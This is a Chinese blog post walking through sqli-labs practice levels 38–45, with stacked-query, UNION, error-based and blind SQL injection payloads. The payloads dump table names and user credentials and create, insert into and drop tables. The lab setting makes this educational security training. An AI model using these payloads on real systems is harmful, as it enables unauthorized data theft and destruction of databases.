sql-labs闯关38~45

最新推荐文章于 2024-12-23 16:20:17 发布
最新推荐文章于 2024-12-23 16:20:17 发布
阅读量1.9k 收藏 3
点赞数 3
分类专栏: sqli-labs 文章标签: 经验分享 web安全 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_44663230/article/details/126581706
版权
本文概述了SQL Labs中38-45关的堆叠注入挑战,涉及GET和POST请求、字符型和数值型注入,以及盲注和爆库爆表等技术。通过详细步骤展示了如何利用堆叠查询和布尔时间注入获取数据库信息并创建、删除表。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

sql-labs闯关38~45:

友善爱国平等诚信民主友善爱国爱国友善平等诚信自由平等友善平等法治诚信民主民主

复习笔记1

内容:

  1. sql-labs第38关(GET请求-堆叠查询注入-字符型)
  2. sql-labs第39关(GET请求-堆叠查询注入-基于数值型)
  3. sql-labs第40关(GET请求-基于盲注-字符型-堆叠)
  4. sql-labs第41关(GET请求-基于盲注-数值型-堆叠)
  5. sql-labs第42关(POST请求-基于错误-字符型-堆叠)
  6. sql-labs第43关(POST请求-基于错误-字符型-堆叠变形)
  7. sql-labs第44关(POST请求-基于错误-字符型-堆叠-盲注)
  8. sql-labs第45关(POST请求-基于错误-字符型-堆叠-盲注)

1.sql-labs第38关

1.1.1
从欢迎界面没有任何提示,先按照老方法先判断闭合点,输入?id=1
1.1.2
输入?id=1 and 1=2,页面没有变化,类型不是数值型
1.1.3

再输入?id=1',出现报错信息,可以判断出闭合点就是',再添加--+,成功闭合
1.1.4
输入?id=-1' union select 1,2,3--+,查看回显位
1.1.5
输入?id=-1' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database()--+,爆库,爆表
1.1.6
输入?id=-1' and updatexml(1,concat(0x7e,database(),0x7e),1)--+,爆库
1.1.7
按照书上的例子,输入?id=1' ;select if(length(database())>5,sleep(5),1))--+,判断数据库长度,结果应该是休眠5秒,但是并没有实现,我不知道什么问题,参考了sqli-labs(38),看了原理,也知道了区别:union 或者union all执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语句

?id=-1' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database() ;create table series38 like users--+

1.1.8
1.1.9
这句命令在爆库爆表之后,再执行了一条新建一张表名为series38,格式参照users,输入之后再刷新,重新加载一下后台,不然看不到

?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users';insert into series38 values(1,1,1)--+

1.1.10
爆字段,再插入一条id、username、password为1的记录

?id=-1' union select 1,group_concat(username),group_concat(password) from users;drop table series38--+

1.1.11
爆数据,再将表名为series38删除。事了拂衣去,深藏功与名

2.sql-labs第39关

2.1.1
输入?id=1,看看正常显示的页面
2.1.2
输入?id=1 and 1=2,页面发生改变,说明这是数值型
2.1.3
输入?id=-1 union select 1,2,3--+,查看回显位,既然这几关主打堆叠注入,那就用堆叠注入

?id=-1 union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database() ;create table series39 like users--+

2.1.4
爆库,爆表,再新建一张名为series39,格式参照users的数据表

?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users';insert into series39 values(2,2,2)--+

2.1.5
爆字段,再插入一条id、username、password为2的记录

?id=-1 union select 1,group_concat(username),group_concat(password) from users;drop table series39--+

2.1.6
爆数据,再将表名为series39删除

3.sql-labs第40关

3.1.1
输入?id=1
3.1.2
输入?id=1 and 1=2,页面没有变化,类型不是数值型,这就说明要猜闭合点了
3.1.3
首先单引号判断法先上场,输入?id=1',页面发生改变,且没有报错信息,但目前不确定闭合点
3.1.4
先继续添加注释符,尝试闭合输入?id=1'--+还是错误页面,担心这关过滤了注释符,所以又输入?id=1' ;%00,页面还是错误,那我就放心了,百分百确定'不是闭合点
3.1.5
再输入?id=1') ;%00成功闭合,可以确定闭合点是')

union注入

3.1.6
输入?id=-1') union select 1,2,3;%00,查看回显位

?id=-1') union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database() ;create table series40 like users ;%00

3.1.7
爆库爆表后,再执行了一条新建一张表名为series40,格式参照users

?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users';insert into series40 values(3,3,3);%00

3.1.8
爆字段,再插入一条id、username、password为3的记录

?id=-1') union select 1,group_concat(username),group_concat(password) from users;drop table series40 ;%00

3.1.9
爆数据,再将表名为series40删除

盲注-布尔+堆叠

在前期判断闭合点时,页面出现错误也没有报错信息,就可以排除报错注入,要用布尔/时间注入
3.2.1
输入?id=1') and length(database())>5;create table series40 like users ;%00判断库长度,并新建表名为series40,格式参考自表users
3.2.2
输入?id=1') and substr(database(),1,1)>'m';insert into series40 values(4,4,4);%00判断数据库第一个字母,并插入一条id、username、password为4的记录
3.2.3
输入?id=1') and (select count(table_name) from information_schema.tables where table_schema=database())>5 ;insert into series40 values(5,5,5);%00判断数据表张数>5,并插入一条id、username、password为5的记录
3.2.4
输入?id=1') and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))>5 ;insert into series40 values(6,6,6);%00判断第一张数据表的长度>5,并插入一条id、username、password为6的记录
3.2.5
输入?id=1') and mid((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)>'m' ;insert into series40 values(7,7,7);%00判断第一张数据表的第一个字母>m,并插入一条id、username、password为7的记录
3.2.6
输入?id=1') and (select count(column_name) from information_schema.columns where table_schema=database() and table_name='users')>5 ;insert into series40 values(8,8,8);%00判断字段数>5,并插入一条id、username、password为8的记录
3.2.7
输入?id=1') and length((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1))>5 ;insert into series40 values(9,9,9);%00判读第一个字段的长度,并插入一条id、username、password为9的记录
3.2.8
输入?id=1') and mid((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),1,1)>'m' ;insert into series40 values(10,10,10);%00判断第一个字段第一个字母,并插入一条id、username、password为10的记录
3.2.9
输入?id=1') and (select count(username) from users)>5 ;insert into series40 values(11,11,11);%00判断username记录>5,并插入一条id、username、password为11的记录
3.2.10
输入?id=1') and length((select username from users limit 0,1))>5 ;insert into series40 values(12,12,12);%00判断username第一条记录长度>5,并插入一条id、username、password为12的记录
3.2.11
输入?id=1') and mid((select username from users limit 0,1),1,1)>'m';drop table series40 ;%00判断第一条记录的第一个字母>m,并将表删除
具体的请参考前面的盲注篇,我累了

4.sql-labs第41关

4.1.1
输入?id=1
4.1.2
输入?id=1 and 1=2,哦豁,我可以跳过猜闭合点这个步骤了
4.1.3
输入?id=-1 union select 1,2,3--+查看回显位,说明可以用union联合查询,若需要请参考上关
4.1.4
输入?id=1 and length(database())>5;create table series41 like users--+判断库长度,并新建表名为series41,格式参考表users
4.1.5
输入?id=1 and substr(database(),1,1)>'m';insert into series41 values(13,13,13)--+判断数据库第一个字母,并插入一条id、username、password为13的记录
4.1.6
输入?id=1 and (select count(table_name) from information_schema.tables where table_schema=database())>5 ;insert into series41 values(14,14,14)--+判断数据表张数>5,并插入一条id、username、password为14的记录
4.1.7
输入?id=1 and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))>5 ;insert into series41 values(15,15,15)--+判断第一张数据表的长度>5,并插入一条id、username、password为15的记录
4.1.8
输入?id=1 and mid((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)>'m' ;insert into series41 values(16,16,16)--+判断第一张数据表的第一个字母>m,并插入一条id、username、password为16的记录
4.1.9
输入?id=1 and (select count(column_name) from information_schema.columns where table_schema=database() and table_name='users')>5 ;insert into series41 values(17,17,17)--+判断字段数>5,并插入一条id、username、password为17的记录
4.1.10
输入?id=1 and length((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1))>5 ;insert into series41 values(18,18,18)--+判读第一个字段的长度,并插入一条id、username、password为18的记录
4.1.11
输入?id=1 and mid((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),1,1)>'m' ;insert into series41 values(19,19,19)--+判断第一个字段第一个字母,并插入一条id、username、password为19的记录
4.1.12
输入?id=1 and (select count(username) from users)>5 ;insert into series41 values(20,20,20)--+判断username记录>5,并插入一条id、username、password为20的记录
4.1.13
输入?id=1 and length((select username from users limit 0,1))>5 ;insert into series41 values(21,21,21)--+判断username第一条记录长度>5,并插入一条id、username、password为21的记录
4.1.14
输入?id=1 and mid((select username from users limit 0,1),1,1)>'m';drop table series41 --+判断第一条记录的第一个字母>m,并将表删除
这关我是将上关的代码修改了之后,直接使用的

5.sql-labs第42关

这关的欢迎界面跟24的二次注入很像,经过一系列的点击、输入、尝试,可以发现,这关跟24关差不都,唯一不同的点就在于,新建用户的那个链接,这关的不允许新建用户了,给了句“如果你想要新建用户,那就黑进去吧”,emmm,我倒是想黑,没那能力咋整。整个摸索下来,有两处输入点,一处是欢迎界面文本框,另一处是输入正确的账号密码,有更改密码的界面
5.1.1
先在第一处输入点username和password都输入1,这个界面就表示失败(我的数据库里没有这个账号密码)
5.1.2
username和password都输入1',居然出现了报错信息,难道这关的注入点在首页?
再在username输入1,password输入1',运行,出现报错,说明password的输入值是关键
5.1.3
再在username随便输入,password输入1'#,运行,没有报错信息,成功闭合
5.1.4
password输入1' and extractvalue(1,concat(0x7e,(select database()),0x7e))#爆库
输入1' and extractvalue(1,concat(0x7e,(select database()),0x7e));create table series42 like users#发现报错注入之后不能成功堆叠新建表
怎么看怎么不习惯,百度了一圈,看到了Sqli-labs Less-42 堆叠注入,麻了,天天爆库爆习惯了,这关跟24关一样不需要爆库,只需要操作users数据就好了
5.1.5
输入1';create table series42 like users#成功新建表,然后这关莫名其妙就结束了
5.1.6
我再输入句1';drop table series42#将表删除,省的占位子

6.sql-labs第43关

6.1.1
按照上关的套路,先都输入1',这明晃晃的提示了我这关的闭合点是')
6.1.2
在username输入1,password输入1',出现报错,很好,注入点还是在password处
6.1.3
password输入1')#尝试闭合,没有报错,成功闭合
6.1.4
输入1');create table series43 like users#成功新建表
6.1.5
再输入1');drop table series43#将表删除

7.sql-labs第44关

7.1.1
这关不管输入11'都没有报错信息
7.1.2
在username、password处输入dumb正确账号密码时,页面会跳转
7.1.3
没有报错信息,只能直接加注释符试探,在username处输入dumb'#,password处输入dumb,页面报错
7.1.4
在username处输入dumb,password处输入dumb'#登录成功了,那这关操作步骤就跟42差不多
7.1.5
输入1';create table series44 like users#
7.1.6
输入1';drop table series44#将表删除

8.sql-labs第45关

8.1.1
这关跟上关一样又没有报错信息,又需要用正确账号密码来验证,那么直接在password处输入dumb',很好,页面错误
8.1.2
输入dumb'#还是错误
8.1.3
那再试试dumb')#成功了,这关闭合点就是'),操作类似43
8.1.4
输入1');create table series45 like users#成功新建表
8.1.5
再输入1');drop table series45#将表删除

总结

做这个堆叠的时候,就觉得很陌生,仔细想了半天,当时上课的时候似乎就一听而过,下课也没去闯关,真实演绎了什么叫“上课不认真,做题两行泪”。多做题还是很有好处的,就像44和45一样,我会按照老套路一个点一个点去尝试,会想到跟之前一样用登录成功的界面来判断是否闭合成功,每次写完一篇,就喜欢懒两天,希望在我开学前,把整套关都过一遍

sqli-labs(38-53)
qq_43395215的博客
08-26 986
文章目录第38关:第39关:第40关:第41关:第42关:第43关:第44关:第45关:第46关:第47关:第48关:第49关:第50关:第51关:第52关:第53关: 第38关: 这一关挺简单的,就一个闭合判断,就可爆数据,但是,这一关的目的不是查询数据,而是通过堆叠注入,对数据库执行操作 堆叠注入,就是利用sql中“;”是标志一句话结束,我们可以通过“;”将多个语句写入到sql语句中,这里的语句就不仅仅是指查询,还有增删查改 闭合判断: /Less-38/?id=1' and 1=1 --+ sql
基于Sqli-Labs靶场的SQL注入-38~45
Joker
01-11 1030
这一篇博客我主要讲了堆叠注入,包括堆叠注入原理、注入条件、注入方法等。堆叠注入的前提条件多,可以实际应用的场景较少。但是只要能够进行堆叠注入,就可以对后台数据库造成很大的伤害。
SQLi Labs Less-38 堆叠注入
热门推荐
wangyuxiang946的博客
06-22 1万+
第三十八关请求方式为GET请求 , 注入类型为 单引号字符串型注入 第一步,测试注入方式 ?id=1' and false-- a SQL不成立时 , 结果不显示 , 固 单引号字符串型注入 , 源码如下 本题的重点在 mysqli_multi_query() , 可同时执行多条SQL , 即叠加注入 第二步,判断字段数 使用order by 排序 测试字段数量 ?id=1' order by 4 -- a 从第1列开始测试 , 直至报错 , 第4列开始异...
sqli-labs(38)
weixin_30522095的博客
06-01 216
0X01 ?id=1' and 1=1%23 正确   ?id=1' and 1=2%23 错误 存在注入 0x1 堆叠注入讲解 (1)前言   国内有的称为堆查询注入,也有称之为堆叠注入。个人认为称之为堆叠注入更为准确。堆叠注入为攻击者提供了很多的攻击手段,通过添加一个新 的查询或者终止查询,可以达到修改数据和调用存储过程的目的。这种技术在SQL注入中还是比较频繁的。 (2...
2024年CentOS RHEL 系统更新安全补丁的方法_怎样升级red hat 补丁(2),网络安全音频面试
2401_84264244的博客
05-05 660
默认情况下, cron 任务被配置成了立即下载并安装所有更新,但是我们可以通过在 /etc/sysconfig/yum-cron 配置文件中把下面两个参数改为yes,从而改变这种行为。为了使来自 root@localhost 的通知能够通过邮件发送给同一账户(再次说明,你可以选择其他账户,如果你想这样的话),下面这些行也是必须的。安装完成以后,打开/etc/yum/yum-cron.conf,然后找到下面这些行内容,你必须确保它们的值和下面展示的一样。而其它的行保证了能够通知并自动下载、安装安全升级。
sqli-labs关卡记录38
m0_59527104的博客
12-23 292
来更新我们的数据库中users表中的id为1的password为123,通过查看数据库,我们就可以看到,id为1 的password已经进行了更改。这里注意到是堆叠注入,就是我们再;后继续书写sql语句来执行,依旧可以执行,这里第38关就是堆叠注入。
sql-labs闯关38~45.html
12-29
文章“sql-labs闯关38~45”是学习和实践SQL注入技术的重要资源,它提供了一套系统的训练方案,帮助学员掌握SQL注入技巧,并了解如何在日常工作中防范此类攻击。通过不断地实践与学习,学员将能够提高个人在网络安全...
sql-labs闯关46~53.html
12-29
标题:“SQL-Labs闯关46~53.html”解析 在当前信息技术的学习领域,掌握SQL语言是数据库管理员和数据分析师的基本技能之一。SQL,即结构化查询语言(Structured Query Language),是一种用于管理关系型数据库的...
sql-labs闯关 1~4.html
12-29
SQL-LABS闯关1~4主要教授用户从基础到进阶的SQL注入技能,涵盖了检测SQL注入漏洞、获取敏感信息、绕过安全机制以及综合应用注入技巧等多个方面。通过这些关卡的练习,用户能够掌握SQL注入的基础知识,并在实际操作中...
sql-labs 闯关 21~25.html
12-29
从标签信息可以看出,这份文档专注于“sqllabs”,很可能是一个特定的在线教学平台或数据库安全学习站点,用于提高用户在网络安全和数据库管理方面的实际操作能力。标签“文章html”表明这是文档的一种格式,但同时...
sqli-labs闯关66~75.html
最新发布
12-29
HTML版的sqli-labs闯关文档,通过视觉呈现的方式,使读者能够更加直观地理解SQL注入的攻击过程和效果。例如,用户可以在浏览器中直接看到注入点,了解如何构造攻击载荷,并观察到攻击执行后的结果。这种交互性和可视...
sqli-labs(38-41)
qq_43579362的博客
02-17 435
0x01 原理 堆叠注入,顾名思义就是很多语句结合在一起进行注入,在sql语句中,以;标志着一条语句的结束,要实现堆叠注入就是用;连接多条语句进行注入,即我们可以结束一个语句后,构造下一个语句。而union select也是将两条语句结合在一起一起执行,两者有何区别?区别在于联合注入只能使用查询语句,而堆叠注入可以使用任何语句,可以使用任何语句并不代表着它没有限制,它可能受到API,数据库引擎,权...
sqli-labs(45)
weixin_30909575的博客
06-03 142
基于报错的password处的')闭合注入 就是没有报错信息 payload和43关一样的构造 转载于:https://www.cnblogs.com/-zhong/p/10965275.html
sqli-labs进阶篇 32关~38
Lucky小小吴的小屋
02-06 1141
本文章主要讲述sqli-labs靶场第32关到38关的通关心得,从三方面讲述如何通关,分别是注入点判断、源码分析、注入过程。文章若有不恰当之处,望指出~~
sqli-labs 38-45
遇事不决冲冲冲
04-09 1158
38关 堆叠注入:简单理解就是一条语句结束后再连接一条语句,这就叫堆叠注入。 举几个最简单的例子: 查询数据并创建一个数据库:select * from users;creat database test; 查询数据并删除一个数据库:select * from users;drop database test; 查询数据并插入数据:select * from users;insert into users(id,username,password) values(‘id’,‘username’,‘pas
sqli-labs (less-38)
kukudeshuo的博客
03-14 981
sqli-labs (less-38) 进入38关,输入id=1 http://127.0.0.1/sql1/Less-38/?id=1' 根据错误信息判断闭合方式为’–+,并且为字符型注入 确定回显位置 http://127.0.0.1/sql1/Less-38/?id=-1' union select 1,2,3--+ 这里发现这难道跟less-1难道不是一模一样吗,所以这里我们不使用union注入,我们使用另一种注入方式:堆叠注入 堆叠注入攻击 堆叠查询注入攻击可以执行多条语句,多语句之间以
sqlilabs38-53详细教程
黑白的博客
11-08 577
声明 学习SQL注入,提高网路安全能力 information_schema 过关之前先要了解一下,我们要研究的是SQL注入,所以有必要先了解一下MYSQL数据库的重要库(表集合):information_schema,这个库中,存在着所有数据库的信息。。。这就意味着,如果我们可以利用漏洞,仅仅去查询这个库,就可以拿到关于数据库的大量信息了。 先看一下,这个数据库的位置 SCHEMATA 该表记录着所有的数据库名 图中,mysql命令行输入如喜爱命令,会显示目前为止所有的数据库(图左1) show dat
SQLi-LABS-Page-3-less-38-53注入教程
残阳泼茶香的博客
03-17 613
Lesson - 38GET - Stacked Query Injection - String堆叠的查询 输入http://sql/Less-38/?id=1 ’ 报错显示说“1” 后面多了一个单引号, 那么就上手吧。 `http://sql/Less-38/?id=1%27%20order%20by%203%23,按着步骤来,http://sql/Less-38/?id=-1%20%2...
sqli-labs闯关
10-09
很高兴为您解答关于sqli-labs闯关的问题!sqli-labs是一个用于学习和实践SQL注入的实验室。通过完成各个关卡,您将能够了解和掌握SQL注入的不同技术和攻击方法。 要开始sqli-labs闯关,您可以按照以下步骤进行: 1...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值